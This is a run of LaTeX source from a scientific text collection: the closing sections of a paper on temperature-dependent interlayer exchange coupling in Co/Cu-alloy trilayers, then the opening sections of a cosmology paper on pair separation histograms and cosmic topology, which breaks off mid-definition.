{\rm tr}_{L} \, {\rm ln} \, {\sf M}({\bf k}_{\|},z)
\end{eqnarray}
is a difference of (in the case of disorder, of configurationally
averaged) grandcanonical potentials for the antiferromagnetic and
ferromagnetic alignments of magnetic slabs ({\it Drchal et al.}, 1996).
The energy integration is performed over a contour $C$ along the real
axis and closed by a large semicircle in the upper half of the complex
energy plane, tr$_{L}$ denotes the trace over angular momentum indices
$L=(\ell m)$, the sum runs over ${\bf k}_{\|}$-vectors in the surface
Brillouin zone, and $N_{\|}$ is the number of lattice sites in one layer.
The quantity ${\sf M}({\bf k}_{\|},z)$ is expressed in terms of the
screened structure constants which couple neighboring (principal) layers
and of the so-called surface Green functions.
All details can be found in ({\it Drchal et al.}, 1996).
We only note that the use of a Green function formulation of the IEC
is essential for describing the randomness in the spacer within the
coherent potential approximation (CPA) which is known to reproduce
compositional trends in random alloys reliably.
The integral in (\ref{eq_IEC}) can be recast into a more suitable form
using the analytic properties of $\Psi(z)$, namely, (i) $\Psi(z)$
is holomorphic in the upper complex halfplane, and (ii)
$z \Psi(z) \rightarrow 0$ for $z \rightarrow \infty, \, {\rm Im} z > 0$.
Let us define a new function $\Phi(y) = -i \, \Psi(E_F+iy)$ of a real
variable $y$, $y \geq 0$.
Then at $T=0$ K,
\begin{eqnarray} \label{eq_I0}
I(0) = \int_{0}^{+\infty} \Phi(y) \, dy \, ,
\end{eqnarray}
while at $T>0$ K,
\begin{eqnarray} \label{eq_IT}
I(T) = 2 \pi k_B T \sum_{k=1}^{\infty} \Phi(y_k) \, ,
\end{eqnarray}
where $k_B$ is the Boltzmann constant and $y_k$ are Matsubara energies
$y_k = \pi k_B T (2k - 1)$.
In the limit $T \rightarrow 0$, $I(T) \rightarrow I(0)$ continuously.
We have verified that the function $\Phi(y)$ can be represented with
a high accuracy as a sum of a few complex exponentials in the form
\begin{equation}
\Phi(y)=\sum_{j=1}^M \, A_j \, {\rm exp} (p_j y) \, ,
\label{dcexp}
\end{equation}
where $A_j$ are complex amplitudes and $p_j$ are complex wave numbers.
An efficient method of finding the parameters $A_j$ and $p_j$ is described
elsewhere ({\it Drchal et al.}, 1998).
The evaluation of $I(T)$ is then straightforward:
\begin{equation}
I(T) = - 2 \pi k_B T \, \sum_{j=1}^M \,
\frac{A_j}{{\rm exp} \, (\pi k_B T p_j) - {\rm exp} \, (-\pi k_B T p_j)} \, ,
\label{cexpT}
\end{equation}
which for $T=0$ K gives
\begin{equation}
I(0) = - \sum_{j=1}^M \, \frac{A_j}{p_j} \, .
\label{cexp0}
\end{equation}
\section{RESULTS AND DISCUSSION}
Numerical studies were performed for an ideal fcc(001) layer
stack of the spacer (Cu) and magnetic (Co) layers with the experimental
lattice spacing of fcc Cu.
The spacer layers can contain the impurities (Zn, Ni, and Au) which form
the substitutional alloy with spacer atoms.
Possible lattice and layer relaxations are neglected.
Alloying with Ni, Zn, or Au alters the electron concentration and,
consequently, modifies the Fermi surface and thus, in turn, also the
temperature dependence of the IEC.
The most obvious effect of the alloying, for $T=0$, is the change of
the periods of oscillations connected with the change of the corresponding
spanning vectors of the alloy Fermi surface ({\it Kudrnovsk\'y et al.},
1996).
The more subtle effect of the alloying is connected with damping of
electron states and relaxation of symmetry rules due to alloying.
To determine the parameters of complex exponentials (\ref{dcexp}), we have
evaluated the function $\Phi(y)$ at 40 Matsubara energies corresponding
to $T=25$ K.
We have verified that the results depend weakly on the actual value of the
parameter $T$.
Special care was devoted to the Brillouin zone integration.
The efficiency of the present approach allows us to perform calculations
with a large number of ${\bf k}_{\|}$-points in the irreducible part of
the surface Brillouin zone (ISBZ).
Note also that such calculations have to be done only once and then the
evaluation of the IEC for any temperature is an easy task.
In particular, we employ typically 40000 ${\bf k}_{\|}$-points in the ISBZ
for the first Matsubara energies close to the Fermi energy and
the number of ${\bf k}_{\|}$-points then progressively decreases for points
distant from the real axis.
The present calculations agree with the results of conventional calculations
({\it Drchal et al.}, 1996) but they are much more efficient numerically,
in particular when calculations for many different temperatures are required.
\epsfsize=30cm
\vglue 10mm
\epsffile{figpm.ps}
\begin{figure} [htb]
\caption{ Absolute values of the discrete Fourier transformations of
$N^2{\cal E}_x(N,T)$ with respect to the spacer thickness $N$ as
a function of the temperature $T$ and the wave vector $q$ for a
trilayer consisting of semiinfinite Co-slabs sandwiching the spacer
with indicated compositions.}
\label{fig.1}
\end{figure}
The calculations were done for spacer thicknesses $N=1-50$ monolayers and
for temperatures $T=0-500$~K (in steps 10~K) and by assuming semiinfinite
Co-slabs.
In this case only one period, namely the so-called short-period exists,
which simplifies the study.
There are several possibilities of how to present results
(see {\it Drchal et al.}, 1998) for more details).
As an illustration, in Fig.~1 we plot the discrete Fourier transformations
({\it Drchal et al.}, 1996) of $N^{2} \, {\cal E}_x(N,T)$ with respect
to $N$, ${\cal E}_x(q,T)$, as a function of variables $q$ and $T$.
The discrete Fourier transformation on a subset $N \in 10-50$ which avoids
the preasymptotic region is employed here.
The positions of peaks of $q=q_m$ then determine oscillation periods
$p=2 \pi/q_m$, while $|{\cal E}_x|$ give oscillation amplitudes
({\it Drchal et al.}, 1996).
In particular, one can see how the modification of the Fermi surface
due to alloying changes the temperature dependence of the IEC, i.e.,
the coefficient $c$ in Eq.(\ref{eq_model}).
The following conclusions can be drawn from numerical results:
(i) The non-random case (Cu) exhibits the period $p \approx 2.53$~MLs
(monolayers) or, equivalently, $q_m \approx 2.48$ in accordance with
previous calculations ({\it Drchal et al.}, 1996).
In accordance with ({\it Kudrnovsk\'y et al.}, 1996), the periods of
oscillations for Cu$_{75}$Zn$_{25}$ alloy are shifted towards higher
periods
$(p \approx 3.05 MLs)$, towards smaller periods for Cu$_{85}$Ni$_{15}$
alloy $(p \approx 2.27 MLs)$, while they remain almost unchanged
for equiconcentration CuAu alloy spacer $(p \approx 2.36$~ MLs);
(ii) The periods of oscillations are temperature independent because
the electronic structure or, alternatively, spanning vectors are
temperature independent;
(iii) The amplitudes exhibit a strong temperature dependence
in agreement with predictions of model theories ({\it Bruno}, 1995).
In particular, our results agree reasonably well with those of Fig.~3
in ({\it d'Albuquerque e Castro et al.}, 1996) for the case of ideal
Cu spacer.
(iv) For alloy spacers at $T=0$ we mention, in particular, the dependence
$N^{-2}$ of the oscillation amplitudes on the spacer thickness $N$ for
CuNi and CuAu alloy spacers, while additional exponential damping due to
disorder was found for the CuZn alloy.
This indicates a finite lifetime of states at the Fermi energy for
${\bf k}_{\|}$-vectors corresponding to short-period oscillations for this
case and only a weak damping for CuAu and CuNi alloys;
(v) Finally, the effect of temperature (the factor $t(N,T)$ in
Eq.~(\ref{eq_model})) is similar for a pure Cu-spacer, CuNi and CuAu alloys,
but it is much smaller for the case of CuZn alloys.
The effect of temperature, similarly to alloying, is to broaden spanning
vectors of the Fermi surface ({\it Bruno}, 1995).
If the damping due to alloying is non-negligible, the combined effect
of disorder and temperature leads to a relatively smaller (compared to
the case $T=$0~K) suppression of the oscillation amplitude with the
temperature.
\bigskip \noindent {\bf Acknowledgment}
This work is a part of activities of the Center for Computational
Material Science sponsored by the Academy of Sciences of the Czech
Republic.
Financial support for this work was provided by the Grant Agency
of the Czech Republic (Project No. 202/97/0598), the Grant Agency
ot the Academy Sciences of the Czech Republic (Project A1010829), the
Project 'Scientific and Technological Cooperation between Germany and
the Czech Republic', the Center for the Computational Materials Science
in Vienna (GZ 45.422 and GZ 45.420), and the TMR Network 'Interface
Magnetism' of the European Commission (Contract No. EMRX-CT96-0089).
\bigskip \noindent {\bf References} \bigskip
\noindent {\it J.~d'Albuquerque e Castro, J.~Mathon, M.~Villeret,
and A.~Umerski}, 1996, Phys. Rev. B {\bf 53}, R13306.
\noindent {\it P.~Bruno}, 1995, Phys. Rev. B {\bf 52}, 411.
\noindent {\it P.~Bruno, J.~Kudrnovsk\'y, V.~Drchal, and I.~Turek},
1996, Phys. Rev. Lett. {\bf 76}, 4254.
\noindent {\it V.~Drchal, J.~Kudrnovsk\'y, I.~Turek, and P.~Weinberger},
1996, Phys. Rev. B {\bf 53}, 15036.
\noindent {\it V.~Drchal, J.~Kudrnovsk\'y, P.~Bruno, and P.~Weinberger},
1998 (in preparation).
\noindent {\it J.~Kudrnovsk\'y, V.~Drchal, P.~Bruno, I.~Turek, and
P.~Weinberger}, 1996, Phys. Rev. B {\bf 54}, R3738.
\noindent {\it M.~van~Schilfgaarde, F.~Herman, S.S.P.~Parkin, and
J.~Kudrnovsk\'y}, 1995, Phys. Rev. Lett. {\bf 74}, 4063.
\end{document}
| 2024-02-18T23:40:14.115Z | 1998-11-10T18:27:08.000Z | algebraic_stack_train_0000 | 1,758 | 2,180 |
|
proofpile-arXiv_065-8588 | \section{Introduction}
\label{intro}
\setcounter{equation}{0}
Current observational data favour Friedmann-Lema\^{\i}tre (FL)
cosmological models as approximate descriptions of our universe at
least since the recombination time. These descriptions are, however,
only local and do not f\/ix the global shape of our universe.
Despite the inf\/initely many possibilities for
its global topology, it is often assumed that spacetime is
simply connected leaving aside the hypothesis, very rich in
observational and physical consequences, that the universe may
be multiply connected, and compact even if it has zero or
negative constant curvature. Since the hypothesis that
our universe has a non-trivial topology has not been excluded,
it is worthwhile testing it (see~\cite{CosmicTop}~--~\cite{ZelNov83}
and references therein).
The most immediate consequence of the hypothesis of multiply-%
connectedness of our universe is the possibility of observing
multiple images of cosmic objects, such as galaxies, quasars, and
the like. Thus, for example, consider the available catalogues of
quasars with redshifts ranging up to $z \approx 4$ which, in
the Einstein-de Sitter cosmological model, corresponds to a
comoving distance $d \approx 3300 \, h^{-1} Mpc$ from us ($h$
is the Hubble constant in units of $100 \, km \, s^{-1}
Mpc^{-1}$). Then, roughly speaking, if our universe is \emph{small}
in the sense that it has closed geodesics of length less than
$2 d$, some of the observed quasars may actually be images of
the same cosmic object.%
\footnote{Note that we are not considering problems which
arise from the possibly short lifetime of quasars. Actually,
this is irrelevant for the point we want to illustrate
with this example.}
More generally, in considering discrete astrophysical sources,
the \emph{observable universe} can be viewed as that part of
the universal covering manifold $\widetilde{M}(t_0)\,$ of the
$t=t_0$ space-like section $M(t_0)$ of spacetime, causally
connected to an image of our position since the moment of
matter-radiation decoupling (here $t_0$ denotes present time)
while, given a catalogue of cosmic sources, the
\emph{observed universe} is that part of the observable
universe which contains all the sources listed in the catalogue.
So, for instance, using quasars as cosmic sources the observed
universe for a catalogue covering the entire sky is a ball with
radius approximately half the radius of the observable universe
(in the Einstein-de Sitter model). If the universe $M(t_0)$ is
small enough in the above-specif\/ied sense, then there may be
\emph{copies} of some cosmic objects in the observed universe,
and an important goal in observational cosmic topology is to
develop methods to determine whether these copies exist.
Direct searching for multiple images of cosmic objects is not a
simple problem. Indeed, due to the f\/initeness of the speed of
light two images of a given object at dif\/ferent distances
correspond to dif\/ferent epochs of its life. Moreover, in
general the two images are seen from dif\/ferent directions.
So one ought to be able to f\/ind out whether two images
correspond to dif\/ferent objects, or correspond to the same
object seen at two dif\/ferent stages of its evolution and at
two dif\/ferent orientations. The problem becomes even more
involved when one takes into account that observational and
selection ef\/fects may also be dif\/ferent for these distinct
images.
One way to handle these dif\/f\/iculties is to use suitable
statistical analysis applied to catalogues. Cosmic crystallography%
~\cite{LeLaLu} is a promising statistical method which looks for
distance correlations between cosmic sources using pair separation
histograms (PSH), i.e. graphs of the number of pairs of sources
versus the squared distance between them. These correlations are
expected to arise from the isometries of the covering group of
$M(t_0)$ which give rise to the (observed) multiple images, and
have been claimed to manifest as sharp peaks~\cite{LeLaLu}, also
called spikes. Moreover, the positions and relative amplitudes
of these spikes have also been thought to be f\/ingerprints
of the shape of the universe (see, however, the references%
~\cite{LeLuUz}~--~\cite{FagGaus}, and also
sections~\ref{fres} and~\ref{concl} of the present paper).
It should be emphasized that just by examining a single PSH
one cannot at all decide whether a particular spike is of
topological origin or simply arises from statistical f\/luctuations.
Actually, depending on the accuracy of the simulation one can obtain
PSH's with hundreds of sharp peaks of purely statistical origin among just a
few spikes of topological nature. Thus, it is of indisputable importance
to perform a theoretical statistical analysis of the distance
correlations in the PSH's at least to have a criterion for
revealing the ultimate origin of the spikes that arise
in the PSH's and pave the way for further ref\/inements of the
crystallographic method.
In this work, by using the probability theory we derive the
expression~(\ref{EPSH2}) for the expected pair separation histogram
(EPSH) of comparable catalogues with the same number of sources and
corresponding to any complete 3-manifold of constant curvature.
The EPSH, which is essentially a PSH from which the statistical noise
has been withdrawn, is derived in a very general topological-geometrical%
-observational setting.
It turns out that the EPSH built from a multiply connected manifold is
an EPSH in which the contributions arising from the correlated images
were withdrawn, plus a term that consists of
a sum of individual contributions from each covering isometry.
{}From the EPSH~(\ref{EPSH2}) we extract its major consequence,
namely that the sharp peaks (or spikes) of topological nature in
individual pair separation histograms are due to Clif\/ford
translations, whereas all other isometries manifest as tiny
deformations of the PSH of the corresponding universal covering
manifold.
This relevant consequence holds for all Robertson-Walker (RW) spacetimes
and in turn gives rise to two others: (i) that Euclidean distinct manifolds
which have the same translations in their covering groups present
the same spike spectra of topological nature. So, the set of topological
spikes (their positions and relative amplitudes) in the PSH alone is not
suf\/f\/icient for distinguishing these compact f\/lat manifolds, making
clear that even if the universe is f\/lat ($\Omega_{tot}=1$) the spike
spectrum is not enough for determining its global shape; and
(ii) that individual PSH's corresponding to hyperbolic 3-manifolds
exhibit no spikes of topological origin, since there are no Clif\/ford
translations in the hyperbolic geometry.
These two corollaries ensure that cosmic crystallography, as originally
formulated, is not a conclusive method for unveiling the shape of the
universe.
As a way to reduce the statistical f\/luctuations in individual
PSH's so as to unveil the contributions of non-translational
isometries to the topological signature, we introduce the
mean pair separation histogram (MPSH) and show that
it is a suitable approximation for the EPSH.
Moreover, we emphasize that the use of MPSH's is restricted
to simulated catalogues due to the unsurmountable practical
dif\/f\/iculties in constructing several comparable catalogues
of real sources.
The lack of spikes of topological origin in PSH's of multiply connected
hyperbolic 3-manifolds has also been found in histograms for the specif\/ic
cases of Weeks~\cite{LeLuUz} and one of the Best~\cite{FagGaus} manifolds,
making apparent that, within the degree of accuracy of the corresponding
plots, the above corollary (ii) holds for these specific cases.
Concerning these references, we also discuss the connection between
ours and their~\cite{LeLuUz,FagGaus} results. Further, we point out
the limitation of the set of conclusions one can withdraw from
such graphs by using, e.g., the specif\/ic PSH shown in f\/ig.~1 of%
~\cite{Fagundes-Gausmann}. The possible origins for the
spikes in PSH's are also discussed, and it is shown that one can
distinguish between statistical sharp peaks (noise) and topological
spikes only through the use of the rather general results obtained
in this article.
The plan of this paper is as follows. In the next section we
describe what a catalogue of cosmic sources is in the context of
Robertson-Walker (RW) spacetimes, and introduce some relevant
def\/initions to set our framework and make our paper as accurate
and self-contained as possible.
In the third section we describe how to construct a PSH from a
given catalogue (either real or simulated), and discuss
qualitatively how distance correlations arise in multiply
connected RW universes. In the fourth section we f\/irst discuss the
concept of \emph{expected} pair separation histogram (EPSH) and
derive its explicit expression in a very general
topological-geometrical-observational setting.
In the f\/ifth section we use the expression for the EPSH obtained
in section~\ref{pshexp} to derive its most general consequence,
namely that spikes of topological origin in PSH's are due to
\emph{translations} alone. We proceed by analyzing how this general
result af\/fects PSH's built from Euclidean and hyperbolic manifolds,
and derive two relevant consequences regarding these classes of manifolds.
We also present in that section the MPSH as a simple approach
aiming at reducing the statistical f\/luctuations in PSH's
so that the contributions from non-translational isometries
become apparent.
In section~\ref{concl} we summarize our conclusions,
brief\/ly indicate possible approaches for further
investigations, and f\/inally discuss the connection between
ours and the results those reported in~\cite{LeLuUz}
and~\cite{FagGaus}.
\section{Catalogues in multiply connected RW spacetimes}
\label{catalogs}
\setcounter{equation}{0}
If the universe is multiply connected and one can form
catalogues of cosmic sources with multiple images, the problem
of identifying its shape can be reduced to that of designing
suitable methods for extracting the underlying topological
information from these catalogues. In this section we describe
what a catalogue of cosmic sources is in the context of
RW spacetimes, and discuss under what conditions
catalogues present multiple images. We f\/irst brief\/ly
review some basic properties of locally homogeneous and isotropic
cosmological models, then we formalise the practical process of
construction of catalogues of discrete astrophysical sources,
and f\/inally we specify the conditions for the existence of
multiple images in a catalogue.
\vspace{6mm}
\noindent \textbf{\large Locally homogeneous and isotropic cosmological
models}
\vspace{3mm}
The spacetime arena for a FL cosmological model is a
4-dimensional manifold endowed with a RW metric which
can be written locally as
\begin{equation}
\label{RW-metric}
ds^2 = dt^2 - a^2(t)\, d \sigma^2 \; ,
\end{equation}
where $t$ is a cosmic time, $d\sigma$ is a standard 3-dimensional
hyperbolic, Euclidean or spherical metric, and $a(t)$ is the
scale factor that carries the unit of length. It is usually
assumed that the $t=const$ spatial sections of a RW spacetime
are one of the following simply connected spaces: hyperbolic ($H^3$),
Euclidean ($E^3$), or the 3-sphere ($S^3$), depending on the local
curvature computed from $d \sigma$. Cosmic topology arises when
we relax the hypothesis of simply-connectedness and consider that
the $t=const$ spatial sections may also be any complete multiply
connected 3-manifold of constant curvature (see, for example,
\cite{Wolf,Ellis}).
In this work we shall consider spacetimes of the form
$I \times M$, with $I$ a (possibly inf\/inite) open interval of
the real line, and $M$ a complete constant curvature 3-manifold,
either simply or multiply connected. Actually, a RW spacetime is
a warped product $I \times_a M$ (see, e.g.,~\cite{O'Neill} for
more details) in that, for any instant $t \in I$, the metric in
$M$ is $d\sigma (t) = a(t) d\sigma$. The manifold $M$ equipped
with the metric $d\sigma (t)$ is denoted by $M(t)$, and
is called \emph{comoving space} at time $t$.
So, \emph{comoving geodesics} and \emph{comoving distances}
at some time $t$ mean, respectively, geodesics of $M(t)$ and
distances between points on $M(t)$.
Throughout this article we will omit the time dependence
of $M(t)$ and $\widetilde{M}(t)$ whenever these manifolds
are endowed with the standard metric $d\sigma\,$.
Before proceeding to the discussion of the notion of catalogues
we recall that in a FL cosmological model the energy-matter content
and Einstein's f\/ield equations determine the local curvature of
the spatial sections and the scale factor $a(t)$.
Thus in this process of cosmological modelling within the framework
of general relativity the introduction of particular values for
cosmological parameters ($H_0$, $\Omega_m$, $\Omega_{\Lambda}$,
$q_0$, and so forth) restricts both the
locally homogeneous-and-isotropic 3-geometry, and
the scalar factor $a(t)$. However, the concepts and results
we shall introduce and derive in this work hold regardless
of the particular 3-geometry and of the form of $a(t)$ provided
that $a(t)$ is a monotonically increasing function, at least
since the recombination time.
So, there is def\/initely no need to introduce any particular
values for the cosmological parameters unless one intends
to examine the consequences of a specif\/ic class of RW models,
which for the sake of generality we do not aim at in the present
article.
\vspace{6mm}
\noindent \textbf{\large Constructing catalogues}
\vspace{3mm}
To formalise the concept of catalogue of cosmic sources, let us
assume that we know the scale factor $a(t)$, and that it is a
monotonically increasing function. We shall also assume that all
cosmic objects of our interest (also referred to simply as
objects) are pointlike and have long lifetimes so that none
was born or dead within the time interval given by $I$. Moreover,
we shall also assume that all objects are comoving, so that their
worldlines have constant spatial coordinates. Although unrealistic,
these assumptions were used implicitly in~\cite{LeLaLu} and%
~\cite{Fagundes-Gausmann} and are very useful to study the
observational consequences of a non-trivial topology for the
universe.
It should be noted that in the process of construction of
catalogues we shall describe below it is assumed that a
particular type of sources (clusters of galaxies, quasars, etc)
or some combination of them (quasars and BL Lac objects, say) is
chosen from the outset.
This approach does not coincide with the exact manner the
astronomers build catalogues, in that usually they simply
record any sources within their range of interest and (or)
observational limitations. However, the model of constructing
catalogues we shall present relies on the fact that any catalogue
of a specif\/ic type of sources ultimately is a selection of
sources of that type from the hypothetical complete set of sources
which can in principle be observed.
Since we are assuming that all objects are comoving their spatial
coordinates are constant. So, the set of all the objects in $M$ is
given by a list of their present comoving positions, and from this
list one can def\/ine a map
\begin{eqnarray}
\qquad \qquad \mu : M(t_0) & \rightarrow & \{1,0\} \nonumber \\
p \: \mapsto \mu(p) &=& \left\{ \begin{array}
{r@{\quad}l}
1 & \mbox{if there is an object at $p\;$,} \\
0 & \mbox{otherwise}\;.
\end{array} \right.
\end{eqnarray}
The set of objects in $M(t_0)$ is thus $\mu^{-1}(1)$.
This is a discrete set in $M(t_0)$ without accumulation points.
Actually, from any map $\mu : M(t_0) \rightarrow \{1,0\}$ such
that $\mu^{-1}(1)$ is a discrete set without accumulation points,
one may def\/ine a set of objects, namely the set $\mu^{-1}(1)$.
We will further assume in this work that the set of objects is a
representative sample of some well-behaved distribution law in
$M(t_0)$. For our purposes in this article a distribution is
well-behaved if it gives rise to samples of points which are
not concentrated in small regions of $M(t_0)$.
Let $\pi: \widetilde{M}(t_0) \rightarrow M(t_0)$ be the
universal covering projection of $M(t_0)$ and $p$ be an
object, that is $p \in \mu^{-1}(1)$. The set $\pi^{-1}(p)$
is the collection of \emph{copies} of $p$ on $\widetilde{M}(t_0)$.
We will refer to these copies as \emph{topological images} or
simply as images of the object $p$, thus the map $\tilde{\mu}$
def\/ined by the commutative diagram
\\
\setlength{\unitlength}{1.5cm}
\begin{picture}(3,3)
\put(4.15,2){$\widetilde{M}(t_0)$}
\put(4.5,1.85){\vector(0,-1){1}}
\put(4.9,2){\vector(1,-1){1.15}}
\put(4.15,0.5){$M(t_0)$}
\put(4.9,0.57){\vector(1,0){1}}
\put(6,0.5){$\{1,0\}$}
\put(4.25,1.3){$\pi$}
\put(5.3,0.35){$\mu$}
\put(5.6,1.5){$\tilde{\mu}$}
\end{picture}
\\
gives the set of all images on the universal covering manifold
$\widetilde{M}(t_0)$.%
\footnote{It has occasionally been used in the
literature a misleading terminology in which the topological
images are classif\/ied as real and ghosts. In most cases the
expression `real image' refers to the nearest
topological image of a given object,
while the expression `ghost image' refers to any other image
of the same object. There are also cases where `real images'
has been used to refer to the topological images which lie
inside a fundamental polyhedron (FP), while `ghost images' refers
to the images outside the FP. This latter classif\/ication of the
images depends on the choice of the FP which is not at all unique.
Actually, these two usages for the expressions `real image' and
`ghost images' are compatible only if the FP is the Dirichlet
domain with centre at an image of the observer~\cite{Images}.
In both cases the terminology is misleading also because it
may suggest that either the nearest images or the images inside a FP
are somehow special. And yet there is no physical or geometrical
property which supports this distinction. Besides, this terminology
is unnecessary since real objects are represented by points
which lie on the manifold $M$, whereas the points on the universal
covering $\widetilde{M}$ can represent only (topological) images of
these objects --- no image is more \emph{real} than the other,
they are simply (topological) images.}
Indeed, the images of the objects in
$M(t_0)$ are the elements of the set $\tilde{\mu}^{-1}(1)$.
Now suppose we perform a full sky coverage survey for the objects
up to a redshift cutof\/f $z_{max}$. Since we are assuming that
we know the metric $a(t)d\sigma$, we can compute the
distance $R$ corresponding to this redshift cutof\/f and so
determine the observed universe corresponding to this survey.
The ball $\mathcal{U} \subset \widetilde{M}(t_0)$ with radius
$R$ and centred at an image of our position is a representation
of this observed universe.
The f\/inite set $\mathcal{O} = \tilde{\mu}^{-1}(1)\cap \mathcal{U}$
is the set of \emph{observable images} since it contains all the
images which can in principle be observed up to a distance $R$ from
one image of our position.
The set of \emph{observed images} or \emph{catalogue} is a subset
$\mathcal{C} \subset \mathcal{O}$, since by several observational
limitations one can hardly record all the images present in the
observed universe. Our observational limitations can be formulated
as \emph{selection rules} which describe how the subset $\mathcal{C}$
arises from $\mathcal{O}$. These selection rules, together with the
distribution law which the objects in $M$ obey, will be referred
to as \emph{construction rules} for the catalogue $\mathcal{C}$.
A good example of construction rules appears in the
simulated catalogue constructed in ref.~\cite{LeLaLu} where an
uniform distribution of points in a 3-torus is assumed together
with a selection rule which dictates how one obtains a catalogue
$\mathcal{C}$ from the set of images in an observed universe
$\mathcal{U}$ subjected to (def\/ined by) the redshift cutof\/f
$z_{max}=0.26$. In that example, to mimic the obscuration ef\/fect
by the galactic plane, they have taken as selection rule that only
the images inside a double cone of aperture $120^\circ$ are observed
or considered. However, in more involved simulations, one can
certainly take other selection rules such as, e.g., luminosity
threshold, f\/inite lifetime and the obscuration by the line of
sight, and (or) a combination of them.
\begin{sloppypar}
Throughout this work we shall assume that catalogues obey well
def\/ined construction rules, and we shall say that two catalogues
are \emph{comparable} when they are def\/ined by the same
construction rules; even if they have a signif\/icantly
dif\/ferent number of sources and correspond to possibly
dif\/ferent (topologically) 3-manifolds compatible with a given
3-geometry.
According to this def\/inition two comparable catalogues
must correspond to a given RW geometry~(\ref{RW-metric}) with
obviously a well-def\/ined scale factor, and the same underlying
redshift cutof\/f. In other words,
comparable catalogues correspond to a precise set of cosmological
parameters of an observed universe, plus a f\/ixed redshift
cutof\/f. The main motivation for formalising in this way the
concept of comparable catalogues comes from the fact that in
the cosmic crystallographic method we are often interested in
comparing PSH's from simulated catalogues against PSH's from real
catalogues. And real catalogues are limited by a redshift cutof\/f
that is converted into distance through an \emph{ad hoc} choice of
a RW geometry. So, to build simulated catalogues comparable to a
specif\/ic real catalogue, for example, one has to begin with
the precise RW geometry that transforms redshifts into distances
in the real catalogues, and use the same redshift cutof\/f of the
underlying real catalogue.
\end{sloppypar}
Finally, it should be noticed that the above def\/inition for a catalogue
f\/its in with the two basic types of catalogues one usually f\/inds
in practice, namely \emph{real catalogues} (arising from
observations) and \emph{simulated catalogues}, which are generated
under well-def\/ined assumptions that are posed to mimic some
observational limitations and (or) to account for simplif\/ying
hypotheses.
\vspace{6mm}
\noindent \textbf{\large Catalogues with multiple images}
\vspace{3mm}
If $M$ is simply connected then $M$ and $\widetilde{M}$ are the
same, and so there is exactly one image for each object. If $M$
is multiply connected then each object has several images (actually an
inf\/inite number of images in the cases of zero and negative
curvature). Suppose that $M$ is multiply connected, and let $P
\subset \widetilde{M}(t_0)$ be a fundamental domain of $M(t_0)$.
$P$ can always be chosen in such a way that $\tilde{\mu}^{-1}(1)
\cap \partial P = \emptyset$, where $\partial P$ is the boundary
of $P$. If we consider the universal covering
$\widetilde{M}(t_0)$ tessellated by $P$, then clearly
$\tilde{\mu}^{-1}(1)$ presents all the periodicities due to the
covering group $\Gamma$, in the sense that in each copy $gP$ of
the fundamental domain ($\,g \in \Gamma\,$) there is the same
distribution of images as in $P$.
To be able to guarantee the existence of multiple
images in a catalog $\mathcal{C}$, we shall need the concept of a
\emph{deep enough} survey, which is a survey
whose corresponding observed universe $\mathcal{U}$ has the
property that for some fundamental polyhedron $P$, there are faces
$F$ and $F'$, identif\/ied by an isometry $g \in \Gamma$, and such
that some portions $E \subset F$ and $g(E) \subset F'$ are in the
interior of $\mathcal{U}$. In particular when $M$ is compact with
some fundamental polyhedron lying inside the observed universe
$\mathcal{U}$, then this observed universe corresponds to a deep
enough survey. To f\/ind out whether a full sky coverage survey is
deep enough, in practice, all one needs to do is to determine the
closest image of our position and using the metric $a(t)d \sigma$
compute the redshift $z_{thr}$ corresponding to half of that
distance. Any full sky coverage survey with redshift
$z > z_{thr}$ is said to be a deep enough survey.%
\footnote{As a matter of fact $z_{thr}$ is the redshift corresponding
to the radius of the inscribed ball in the Dirichlet polyhedron of
$M$ centred in an image of our position~\cite{Images}.}
When $M$ is multiply connected and the survey is deep enough the
set of observable topological images $\mathcal{O}$ contains multiple
images of some cosmic objects. If, in addition, our observational
capabilities allow the presence of multiple images in
$\mathcal{C}$, then the catalogue has information on the
periodicities due to the covering group $\Gamma$, and so
about the manifold $M$. Every pair of images of one object is
related by an isometry of $\Gamma$. These pairs of images
have been called \emph{gg-pairs}~\cite{LeLaLu}, however
when referring to them collectively we shall use the term
$\Gamma$-pairs, reserving the name $g$-pair for any pair related
by a specif\/ic isometry $g \in \Gamma$. The $\Gamma$-pairs in
$\mathcal{C}$ give rise to correlations in the positions of the
observed images. The main goal of any statistical approach to
cosmic topology based on discrete sources is to develop methods
to reveal these correlations. Cosmic crystallography is one such
method, and uses PSH's to obtain the \emph{distance correlations}
which arise from these correlations in positions.
It should be stressed that there are two independent conditions
that must be satisf\/ied to have multiple images in a catalogue
$\mathcal{C}$. Firstly, the survey has to be deep enough, so that
in the observed universe $\mathcal{U}$ there must exist multiple
observable images of cosmic objects.
Secondly, the selection rules, which dictate how one obtains a
catalogue $\mathcal{C}$ from the observed universe $\mathcal{U}$,
must not be so restrictive as to rule out the possible multiple
images $\mathcal{C}$.
Clearly if the survey is not deep enough there is no chance of
having multiple images in $\mathcal{C}$, regardless of the
quality of the observations. On the other hand, even when the
survey is deep enough, if the selection rules are too strict
they may reduce the multiple images in $\mathcal{C}$ to a level
that the detection of topology becomes impossible.
Finally, it should be noticed that when $M$ is simply connected,
to any cosmic object corresponds just one image, so in this case
there is an one-to-one correspondence between images and objects,
and we can simply identify them as the same entity. Since we do
not know a priori whether our universe is simply or multiply
connected, we do not know if we are recording objects or just
images in real catalogues, hence we say that a catalogue is formed
by \emph{cosmic sources}.
\section{Pair separation histograms}
\label{histog}
\setcounter{equation}{0}
The purpose of this section is two-fold. F\/irst we shall
give a brief description of what a PSH is and how to construct
it. Then we shall describe qualitatively how distance
correlations arise in a particular multiply connected universe,
motivating therefore the statistical analysis we will perform in
the next section.
To build a PSH we simply evaluate a suitable one-to-one function
$f$ of the distance $r$ between the cosmic sources of every pair
{}from a given catalogue $\mathcal{C}$, and then count the number
of pairs for which these values $f(r)$ lie within certain
subintervals. These subintervals must form a partition of
the interval $(0,f(2R)]$, where $R$ is the distance from us
to the most distant source in the catalogue. Usually all the
subintervals are taken to be of equal length. The PSH is
just a plot of this counting. Actually, what we shall call
a PSH is a normalized version of this plot. The function
$f$ is usually taken to be the square function, whereas for very
deep catalogues it might be convenient to try some hyperbolic
function if we are, for example, dealing with open FLRW models.
In line with the usage in the literature and to be specif\/ic,
in what follows we will take $f$ to be the square function.
However, it should be emphasized that the results we obtain
here and in the next section hold regardless of this
particular choice.
A formal description of the above procedure is as follows.
Given a catalogue $\mathcal{C}$ of cosmic sources we denote
by $\eta(s)$ the number of pairs of sources whose squared
separation is $s$. Formally, this is given by the function
\begin{eqnarray*}
\eta : (0,4R^2] & \rightarrow & [0,\infty) \\
s & \mapsto & \frac{1}{2} \, \mbox{Card}(\Delta^{-1}(s))\;,
\end{eqnarray*}
